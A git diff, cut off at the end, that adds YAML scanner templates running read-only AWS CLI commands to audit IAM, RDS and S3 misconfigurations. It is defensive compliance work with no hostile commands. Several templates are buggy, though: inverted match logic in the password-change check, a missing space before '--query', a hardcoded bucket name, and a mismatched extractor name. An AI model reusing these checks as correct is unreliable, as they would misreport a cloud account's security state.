severity: high + description: | + Checks if Multi-Factor Authentication (MFA) is enabled for the AWS root account + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-summary.html + tags: cloud,devops,aws,amazon,iam,aws-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam get-account-summary | jq -r '.SummaryMap.AccountMFAEnabled' + + matchers: + - type: word + words: + - "0" + + extractors: + - type: dsl + dsl: + - '"MFA is not enabled on your AWS Root account"' diff --git a/cloud/aws/iam/iam-ssh-keys-rotation.yaml b/cloud/aws/iam/iam-ssh-keys-rotation.yaml new file mode 100644 index 0000000000..aeb70ce6ee --- /dev/null +++ b/cloud/aws/iam/iam-ssh-keys-rotation.yaml @@ -0,0 +1,49 @@ +id: iam-ssh-keys-rotation +info: + name: SSH Key Rotation - 90-Day Policy + author: princechaddha + severity: high + description: | + Verifies that IAM SSH public keys are rotated every 90 days, enhancing security and preventing unauthorized access to AWS CodeCommit repositories + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/list-ssh-public-keys.html + tags: cloud,devops,aws,amazon,iam,ssh,aws-cloud-config + +flow: | + code(1) + for(let UserName of iterate(template.users)){ + set("user", UserName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam list-users --query 'Users[*].UserName' + + extractors: + - type: json # type of the extractor + internal: true + name: users + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws iam list-ssh-public-keys --user-name $user | jq -r '.SSHPublicKeys[] | select(.UploadDate | fromdateiso8601 < (now - (90 * 86400))) | .SSHPublicKeyId' + + extractors: + - type: regex # type of the extractor + name: accesskey + internal: true + regex: + - '^AP.*' + + - type: dsl + dsl: + - '"The SSH Public Key " + accesskey +" is older than 90 days"' diff --git a/cloud/aws/iam/iam-unapproved-policy.yaml b/cloud/aws/iam/iam-unapproved-policy.yaml new file mode 100644 index 0000000000..42d7d8fb65 --- /dev/null +++ b/cloud/aws/iam/iam-unapproved-policy.yaml @@ -0,0 +1,37 @@ +id: iam-unapproved-policy +info: + name: Unapproved IAM Policy Attachments + author: princechaddha + severity: high + description: | + Checks for the attachment of unapproved Amazon IAM managed policies to IAM roles, users, or groups, ensuring compliance with organizational access policies + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/get-policy.html + tags: cloud,devops,aws,amazon,iam,ssl,tls,aws-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AmazonRDSFullAccess --query 'Policy.{"AttachmentCount": AttachmentCount}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "AttachmentCount" + + - type: word + part: body + words: + - '"AttachmentCount": 0' + negative: true + + extractors: + + - type: dsl + dsl: + - '"Unapproved IAM policy is used within your AWS cloud account"' diff --git a/cloud/aws/iam/iam-user-password-change.yaml b/cloud/aws/iam/iam-user-password-change.yaml new file mode 100644 index 0000000000..01bd859d59 --- /dev/null +++ b/cloud/aws/iam/iam-user-password-change.yaml @@ -0,0 +1,28 @@ +id: iam-user-password-change +info: + name: Enable Self-Service Password Change for IAM Users + author: princechaddha + severity: high + description: | + Verifies that all Amazon IAM users have permissions to change their own console passwords, allowing access to 'iam:ChangePassword' for their accounts and 'iam:GetAccountPasswordPolicy' action. + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-password-policy.html + tags: cloud,devops,aws,amazon,iam,aws-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam get-account-password-policy --query 'PasswordPolicy.AllowUsersToChangePassword' + + matchers: + - type: word + words: + - "true" + + extractors: + - type: dsl + dsl: + - '"AllowUsersToChangePassword Policy is not enabled in your AWS account"' diff --git a/cloud/aws/iam/ssl-cert-renewal.yaml b/cloud/aws/iam/ssl-cert-renewal.yaml new file mode 100644 index 0000000000..f3663cbb97 --- /dev/null +++ b/cloud/aws/iam/ssl-cert-renewal.yaml @@ -0,0 +1,29 @@ +id: ssl-cert-renewal +info: + name: SSL/TLS Certificates in AWS IAM about to expire in 30 days + author: princechaddha + severity: medium + description: | + Checks if SSL/TLS certificates in AWS IAM are set for renewal 30 days before expiration. + reference: + - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-password-policy.html + tags: cloud,devops,aws,amazon,iam,ssl,tls,aws-cloud-config + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws iam list-server-certificates | jq -r '.ServerCertificateMetadataList[] | select(.Expiration | fromdateiso8601 - now < (30 * 86400)) | .ServerCertificateName' + + extractors: + - type: regex + name: certificate + internal: true + regex: + - '\b[a-zA-Z0-9]+\b' + + - type: dsl + dsl: + - 'certificate + " Certificate is about to expire in 30 days"' diff --git a/cloud/aws/rds/aurora-copy-tags-snap.yaml b/cloud/aws/rds/aurora-copy-tags-snap.yaml new file mode 100644 index 0000000000..693c7ba87f --- /dev/null +++ b/cloud/aws/rds/aurora-copy-tags-snap.yaml @@ -0,0 +1,55 @@ +id: aurora-copy-tags-snap +info: + name: Aurora Snapshot Tag Copy + author: princechaddha + severity: high + description: | + Ensures Amazon Aurora clusters have Copy Tags to Snapshots feature enabled to automatically copy tags from clusters to snapshots. + impact: | + Without this, tags identifying ownership, purpose, or other critical information aren't propagated to snapshots, complicating management and compliance. + remediation: | + Enable Copy Tags to Snapshots for Aurora clusters via the AWS Management Console or modify the DB cluster to include this feature using AWS CLI. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_Tagging.html + tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let clustername of iterate(template.clusters)){ + set("cluster", clustername) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-clusters --region $region --output json --query 'DBClusters[?Engine==`aurora-mysql` || Engine==`aurora-postgresql`].DBClusterIdentifier | []' + + extractors: + - type: json + name: clusters + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-clusters --region $region --db-cluster-identifier $cluster --query 'DBClusters[*].CopyTagsToSnapshot' + + matchers: + - type: word + words: + - 'false' + + extractors: + - type: dsl + dsl: + - '"Copy Tags To Snapshot is not enable for cluster " + cluster' diff --git a/cloud/aws/rds/aurora-delete-protect.yaml b/cloud/aws/rds/aurora-delete-protect.yaml new file mode 100644 index 0000000000..aa5f1ff91f --- /dev/null +++ b/cloud/aws/rds/aurora-delete-protect.yaml @@ -0,0 +1,55 @@ +id: aurora-delete-protect +info: + name: Aurora Cluster Deletion Protection + author: princechaddha + severity: medium + description: | + Ensure Amazon Aurora clusters have Deletion Protection enabled to prevent accidental data loss. + impact: | + Without Deletion Protection, Aurora clusters can be accidentally deleted, leading to irreversible data loss. + remediation: | + Enable Deletion Protection by modifying the Aurora cluster settings in the AWS Management Console or via the AWS CLI. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/DBInstanceDeletionProtection.html + tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let clustername of iterate(template.clusters)){ + set("cluster", clustername) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-clusters --region $region --output json --query 'DBClusters[?Engine==`aurora-mysql` || Engine==`aurora-postgresql`].DBClusterIdentifier | []' + + extractors: + - type: json + name: clusters + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-clusters --region $region --db-cluster-identifier $cluster--query 'DBClusters[*].DeletionProtection' + + matchers: + - type: word + words: + - 'false' + + extractors: + - type: dsl + dsl: + - '"Deletion Protection safety feature is not enabled for " + cluster' diff --git a/cloud/aws/rds/iam-db-auth.yaml b/cloud/aws/rds/iam-db-auth.yaml new file mode 100644 index 0000000000..8bfd0e4a41 --- /dev/null +++ b/cloud/aws/rds/iam-db-auth.yaml @@ -0,0 +1,55 @@ +id: iam-db-auth +info: + name: IAM Database Authentication + author: princechaddha + severity: medium + description: | + Ensure IAM Database Authentication is enabled for RDS instances, allowing IAM service to manage database access, thereby removing the need to store user credentials within database configurations. + impact: | + Without IAM Database Authentication, database credentials need to be managed internally, increasing the risk of credential leakage and unauthorized access. + remediation: | + Enable IAM Database Authentication for MySQL and PostgreSQL RDS database instances to leverage IAM for secure, token-based access control. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let DBInstances of iterate(template.instances)){ + set("db", DBInstances) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --output json --query 'DBInstances[?Engine==`mysql` || Engine==`postgres`].DBInstanceIdentifier | []' + + extractors: + - type: json + name: instances + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].IAMDatabaseAuthenticationEnabled' + + matchers: + - type: word + words: + - 'false' + + extractors: + - type: dsl + dsl: + - '"Database Authentication feature is not enabled for RDS database instance " + db' diff --git a/cloud/aws/rds/rds-backup-enable.yaml b/cloud/aws/rds/rds-backup-enable.yaml new file mode 100644 index 0000000000..e9a2314ee2 --- /dev/null +++ b/cloud/aws/rds/rds-backup-enable.yaml @@ -0,0 +1,55 @@ +id: rds-backup-enable +info: + name: RDS Automated Backup Check + author: princechaddha + severity: high + description: | + Ensure that your Amazon RDS database instances have automated backups enabled for point-in-time recovery. + impact: | + Lack of automated backups can lead to data loss in case of accidental deletion or database corruption. + remediation: | + Enable automated backups for RDS instances by setting the backup retention period to a value other than 0. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithAutomatedBackups.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let DBInstances of iterate(template.instances)){ + set("db", DBInstances) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier' + + extractors: + - type: json + name: instances + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].BackupRetentionPeriod' + + matchers: + - type: word + words: + - '0' + + extractors: + - type: dsl + dsl: + - '"Automated backups are not enabled for " + db + " RDS database instance"' diff --git a/cloud/aws/rds/rds-deletion-protection.yaml b/cloud/aws/rds/rds-deletion-protection.yaml new file mode 100644 index 0000000000..7757553fe2 --- /dev/null +++ b/cloud/aws/rds/rds-deletion-protection.yaml @@ -0,0 +1,56 @@ +id: rds-deletion-protection +info: + name: RDS Deletion Protection + author: princechaddha + severity: high + description: | + Ensure Amazon RDS instances have Deletion Protection enabled to prevent accidental deletions. + impact: | + Without Deletion Protection, RDS instances can be inadvertently deleted, leading to potential data loss and service disruption. + remediation: | + Enable Deletion Protection for all Amazon RDS instances via the AWS Management Console or using the AWS CLI. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let DBInstances of iterate(template.instances)){ + set("db", DBInstances) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier' + + extractors: + - type: json + name: instances + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].DeletionProtection' --output json + + matchers: + - type: word + words: + - 'false' + + extractors: + - type: dsl + dsl: + - '"RDS Deletion protection feature is not enabled for RDS database instance " + db' diff --git a/cloud/aws/rds/rds-encryption-check.yaml b/cloud/aws/rds/rds-encryption-check.yaml new file mode 100644 index 0000000000..aa1ae77de7 --- /dev/null +++ b/cloud/aws/rds/rds-encryption-check.yaml @@ -0,0 +1,55 @@ +id: rds-encryption-check +info: + name: RDS Instance Encryption + author: princechaddha + severity: high + description: | + Ensure that your Amazon RDS database instances are encrypted to fulfill compliance requirements for data-at-rest encryption. + impact: | + Non-encrypted RDS instances may lead to data breaches, failing to comply with data protection regulations, which could result in hefty fines and loss of reputation. + remediation: | + Enable encryption for your Amazon RDS instances by modifying the instance and setting the "Storage Encrypted" option to true. For new instances, enable encryption within the launch wizard. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.Encryption.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let DBInstances of iterate(template.instances)){ + set("db", DBInstances) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier' + + extractors: + - type: json + name: instances + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].{"StorageEncrypted":StorageEncrypted,"KmsKeyId":KmsKeyId}' + + matchers: + - type: word + words: + - 'false' + + extractors: + - type: dsl + dsl: + - '"The encryption of data at rest is not enabled for " + db + " RDS database instance"' diff --git a/cloud/aws/rds/rds-event-notify.yaml b/cloud/aws/rds/rds-event-notify.yaml new file mode 100644 index 0000000000..99f05db4e2 --- /dev/null +++ b/cloud/aws/rds/rds-event-notify.yaml @@ -0,0 +1,35 @@ +id: rds-event-notify +info: + name: RDS Event Notification Absence + author: princechaddha + severity: medium + description: | + Checks for the activation of event notifications for Amazon RDS instances to monitor significant database events. + impact: | + Without event notifications, there's a risk of missing critical database events, impacting operational awareness and incident response. + remediation: | + Enable event notifications in Amazon RDS by creating an event subscription with Amazon SNS to receive notifications. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_Events.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-event-subscriptions --region $region --query 'EventSubscriptionsList' + + matchers: + - type: word + words: + - '[]' + + extractors: + - type: dsl + dsl: + - '"No event notifications for RDS resources in " + region + " AWS region"' diff --git a/cloud/aws/rds/rds-event-sub-enable.yaml b/cloud/aws/rds/rds-event-sub-enable.yaml new file mode 100644 index 0000000000..7150f48056 --- /dev/null +++ b/cloud/aws/rds/rds-event-sub-enable.yaml @@ -0,0 +1,35 @@ +id: rds-event-sub-enable +info: + name: RDS Event Subscription Not Enabled + author: princechaddha + severity: high + description: | + Ensures Amazon RDS event notifications are enabled for database instance level events, allowing for real-time alerts on operational changes. + impact: | + Lack of event notifications may delay the response to critical RDS operational events, affecting database availability and performance. + remediation: | + Enable RDS event notification subscriptions for relevant database instance level events through the AWS Management Console or AWS CLI. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_Events.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-event-subscriptions --region $region --query "EventSubscriptionsList[?SourceType == 'db-instance'].CustSubscriptionId" + + matchers: + - type: word + words: + - '[]' + + extractors: + - type: dsl + dsl: + - '"There are no Amazon RDS event subscriptions created for instance level events in " + region + " AWS region"' diff --git a/cloud/aws/rds/rds-event-sub.yaml b/cloud/aws/rds/rds-event-sub.yaml new file mode 100644 index 0000000000..fcc8aec418 --- /dev/null +++ b/cloud/aws/rds/rds-event-sub.yaml @@ -0,0 +1,35 @@ +id: rds-event-sub +info: + name: RDS Security Group Event Notifications + author: princechaddha + severity: high + description: | + Ensure RDS event notification subscriptions are active for database security group events to monitor and react to changes in security configurations. + impact: | + Without notifications for security group events, unauthorized changes may go unnoticed, potentially leading to security breaches or data exposure. + remediation: | + Enable Amazon RDS event notification subscriptions for relevant database security group events through the AWS Management Console or AWS CLI. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_Events.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-event-subscriptions --region $region --query "EventSubscriptionsList[?SourceType == 'db-security-group'].CustSubscriptionId" + + matchers: + - type: word + words: + - '[]' + + extractors: + - type: dsl + dsl: + - '"There are no Amazon RDS event subscriptions created for database security groups available in " + region + " AWS region."' diff --git a/cloud/aws/rds/rds-gp-ssd-usage.yaml b/cloud/aws/rds/rds-gp-ssd-usage.yaml new file mode 100644 index 0000000000..f5aa7667eb --- /dev/null +++ b/cloud/aws/rds/rds-gp-ssd-usage.yaml @@ -0,0 +1,55 @@ +id: rds-gp-ssd-usage +info: + name: RDS General Purpose SSD Usage + author: princechaddha + severity: high + description: | + Ensure Amazon RDS instances use General Purpose SSDs for cost-effective storage suitable for a wide range of workloads, except for applications needing over 10000 IOPS or 160 MiB/s throughput. + impact: | + Using Provisioned IOPS SSDs when not required can significantly increase AWS costs without providing necessary performance benefits. + remediation: | + Convert RDS instances from Provisioned IOPS to General Purpose SSDs to optimize costs without sacrificing I/O performance for most database workloads. + reference: + - https://aws.amazon.com/rds/features/storage/ + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let DBInstances of iterate(template.instances)){ + set("db", DBInstances) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier' + + extractors: + - type: json + name: instances + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].StorageType' + + matchers: + - type: word + words: + - 'io1' + + extractors: + - type: dsl + dsl: + - 'db + " RDS instance uses Provisioned IOPS SSD, not the most cost-effective storage"' diff --git a/cloud/aws/rds/rds-public-snapshot.yaml b/cloud/aws/rds/rds-public-snapshot.yaml new file mode 100644 index 0000000000..70a6fcaed9 --- /dev/null +++ b/cloud/aws/rds/rds-public-snapshot.yaml @@ -0,0 +1,55 @@ +id: rds-public-snapshot +info: + name: RDS Public Snapshot Exposure + author: princechaddha + severity: high + description: | + Checks if AWS RDS database snapshots are publicly accessible, risking exposure of sensitive data. + impact: | + Public snapshots can expose sensitive data to unauthorized users, leading to potential data breaches. + remediation: | + Modify the snapshot's visibility settings to ensure it is not public, only shared with specific AWS accounts. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let RDPsnaps of iterate(template.snapshots)){ + set("snapshot", RDPsnaps) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-snapshots --region $region --snapshot-type manual --output json --query 'DBSnapshots[*].DBSnapshotIdentifier' + + extractors: + - type: json + name: snapshots + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-snapshot-attributes --region $region --db-snapshot-identifier $snapshot --query 'DBSnapshotAttributesResult.DBSnapshotAttributes' + + matchers: + - type: word + words: + - '"all"' + + extractors: + - type: dsl + dsl: + - '"RDS snapshot " + snapshot + " is public"' diff --git a/cloud/aws/rds/rds-public-subnet.yaml b/cloud/aws/rds/rds-public-subnet.yaml new file mode 100644 index 0000000000..83a3d7e467 --- /dev/null +++ b/cloud/aws/rds/rds-public-subnet.yaml @@ -0,0 +1,73 @@ +id: rds-public-subnet +info: + name: RDS Instance Private Subnet + author: princechaddha + severity: high + description: | + Ensure Amazon RDS database instances are not provisioned in VPC public subnets to avoid direct Internet exposure. + impact: | + RDS instances in public subnets can be directly accessed from the Internet, increasing the risk of unauthorized access and potential data breaches. + remediation: | + Migrate RDS instances to private subnets within the VPC and ensure proper network ACLs and security group settings are in place to restrict access. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_VPC.WorkingWithRDSInstanceinaVPC.html#USER_VPC.Subnets + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let DBInstances of iterate(template.instances)){ + set("db", DBInstances) + code(2) + for(let SubnetNames of iterate(template.subnets)){ + set("subnet", SubnetNames) + code(3) + } + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier' + + extractors: + - type: json + name: instances + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].DBSubnetGroup.Subnets[*].SubnetIdentifier[]' + + extractors: + - type: json + name: subnets + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-route-tables --region $region --filters "Name=association.subnet-id,Values=$subnet" --query 'RouteTables[*].Routes[]' + + matchers: + - type: word + words: + - 'igw-' + - '0.0.0.0/0' + + extractors: + - type: dsl + dsl: + - 'db + " RDS instance is setup within a public subnet"' diff --git a/cloud/aws/rds/rds-ri-payment-fail.yaml b/cloud/aws/rds/rds-ri-payment-fail.yaml new file mode 100644 index 0000000000..183fc42af7 --- /dev/null +++ b/cloud/aws/rds/rds-ri-payment-fail.yaml @@ -0,0 +1,55 @@ +id: rds-ri-payment-fail +info: + name: RDS RI Payment Failure + author: princechaddha + severity: high + description: | + Identifies failed RDS Reserved Instance purchases due to payment failures, affecting potential cost savings. + impact: | + Prevents utilization of reserved instance discounts, potentially leading to higher operational costs. + remediation: | + Review the payment methods on file and retry the reservation purchase for RDS instances to secure discounted rates. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithReservedDBInstances.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let DBInstances of iterate(template.instances)){ + set("db", DBInstances) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-reserved-db-instances --region $region --output json --query 'ReservedDBInstances[*].ReservedDBInstanceId' + + extractors: + - type: json + name: snapshots + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-reserved-db-instances --region $region --reserved-db-instance-id $db --query 'ReservedDBInstances[*].State' + + matchers: + - type: word + words: + - 'payment-failed' + + extractors: + - type: dsl + dsl: + - '"RDS Reserved Instance purchase has failed for " + db' diff --git a/cloud/aws/rds/rds-snapshot-encryption.yaml b/cloud/aws/rds/rds-snapshot-encryption.yaml new file mode 100644 index 0000000000..f20eb715d4 --- /dev/null +++ b/cloud/aws/rds/rds-snapshot-encryption.yaml @@ -0,0 +1,55 @@ +id: rds-snapshot-encryption +info: + name: RDS Snapshot Encryption + author: princechaddha + severity: medium + description: | + Ensure Amazon RDS database snapshots are encrypted for data-at-rest compliance within AWS environments. + impact: | + Unencrypted RDS snapshots can expose sensitive data to unauthorized access, risking data breach and non-compliance penalties. + remediation: | + Enable encryption for RDS snapshots by using AWS KMS Customer Master Keys (CMKs) for enhanced data security and compliance. + reference: + - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_EncryptSnapshot.html + tags: cloud,devops,aws,amazon,rds,aws-cloud-config + +variables: + region: "ap-northeast-1" + +flow: | + code(1) + for(let RDPsnaps of iterate(template.snapshots)){ + set("snapshot", RDPsnaps) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws rds describe-db-snapshots --region $region --snapshot-type manual --output json --query 'DBSnapshots[*].DBSnapshotIdentifier' + + extractors: + - type: json + name: snapshots + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws rds describe-db-snapshots --region $region --db-snapshot-identifier $snapshot --query 'DBSnapshots[*].Encrypted' + + matchers: + - type: word + words: + - 'false' + + extractors: + - type: dsl + dsl: + - '"Amazon RDS database snapshot " + snapshot + " is not encrypted"' diff --git a/cloud/aws/s3/s3-access-logging.yaml b/cloud/aws/s3/s3-access-logging.yaml new file mode 100644 index 0000000000..16ba9112d3 --- /dev/null +++ b/cloud/aws/s3/s3-access-logging.yaml @@ -0,0 +1,48 @@ +id: s3-access-logging +info: + name: S3 Bucket - Access Logging Not Enabled + author: princechaddha + severity: medium + description: | + This template verifies if the Server Access Logging feature is enabled for Amazon S3 buckets, which is essential for tracking access requests for security and audit purposes. + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-logging --bucket $bucket --query 'LoggingEnabled' + + matchers: + - type: word + words: + - "null" + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" does not have access logging enabled."' diff --git a/cloud/aws/s3/s3-auth-fullcontrol.yaml b/cloud/aws/s3/s3-auth-fullcontrol.yaml new file mode 100644 index 0000000000..028eb24393 --- /dev/null +++ b/cloud/aws/s3/s3-auth-fullcontrol.yaml @@ -0,0 +1,48 @@ +id: s3-auth-fullcontrol +info: + name: Restrict S3 Buckets FULL_CONTROL Access for Authenticated Users + author: princechaddha + severity: critical + description: | + Checks if Amazon S3 buckets grant FULL_CONTROL access to authenticated users, preventing unauthorized operations + reference: + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-acl --bucket $bucket --query 'Grants[?(Grantee.URI==`http://acs.amazonaws.com/groups/global/AuthenticatedUsers`)]' + + matchers: + - type: word + words: + - '"Permission": "FULL_CONTROL"' + + extractors: + - type: dsl + dsl: + - '"FULL_CONTROL is enabled for Authenticated Users on S3 Bucket " + bucket' diff --git a/cloud/aws/s3/s3-bucket-key.yaml b/cloud/aws/s3/s3-bucket-key.yaml new file mode 100644 index 0000000000..36b39ae40b --- /dev/null +++ b/cloud/aws/s3/s3-bucket-key.yaml @@ -0,0 +1,48 @@ +id: s3-bucket-key +info: + name: S3 Bucket Key not enabled + author: princechaddha + severity: medium + description: | + This template verifies if Amazon S3 buckets have bucket keys enabled to optimize the cost of AWS Key Management Service (SSE-KMS) for server-side encryption + reference: + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-encryption --bucket cc-prod-log-bucket --query 'ServerSideEncryptionConfiguration.Rules[?ApplyServerSideEncryptionByDefault.SSEAlgorithm==`aws:kms`].BucketKeyEnabled' + + matchers: + - type: word + words: + - false + + extractors: + - type: dsl + dsl: + - '"Key is not enabled for S3 Bucket " + bucket' diff --git a/cloud/aws/s3/s3-bucket-policy-public-access.yaml b/cloud/aws/s3/s3-bucket-policy-public-access.yaml new file mode 100644 index 0000000000..e57f941a48 --- /dev/null +++ b/cloud/aws/s3/s3-bucket-policy-public-access.yaml @@ -0,0 +1,56 @@ +id: s3-bucket-policy-public-access +info: + name: Public Access of S3 Buckets via Policy + author: princechaddha + severity: critical + description: | + This template checks if Amazon S3 buckets are configured to prevent public access via bucket policies + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api list-buckets --query 'Buckets[*].Name' + + extractors: + - type: json # type of the extractor + internal: true + name: buckets + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-policy --bucket $bucket --query Policy --output text + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Effect":"Allow"' + + - type: word + part: body + words: + - '"Principal":"*"' + - '"AWS":"*"' + + extractors: + - type: dsl + dsl: + - '"The S3 bucket " + bucket +" is publicly accessible via Policy"' diff --git a/cloud/aws/s3/s3-mfa-delete-check.yaml b/cloud/aws/s3/s3-mfa-delete-check.yaml new file mode 100644 index 0000000000..ca54173827 --- /dev/null +++ b/cloud/aws/s3/s3-mfa-delete-check.yaml @@ -0,0 +1,48 @@ +id: s3-mfa-delete-check +info: + name: S3 Bucket MFA Delete Configuration Check + author: princechaddha + severity: low + description: | + This template verifies that Amazon S3 buckets are configured with Multi-Factor Authentication (MFA) Delete feature, ensuring enhanced protection against unauthorized deletion of versioned objects + reference: + - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-versioning.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +flow: | + code(1) + for(let bucketName of iterate(template.buckets)){ + set("bucket", bucketName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws s3api 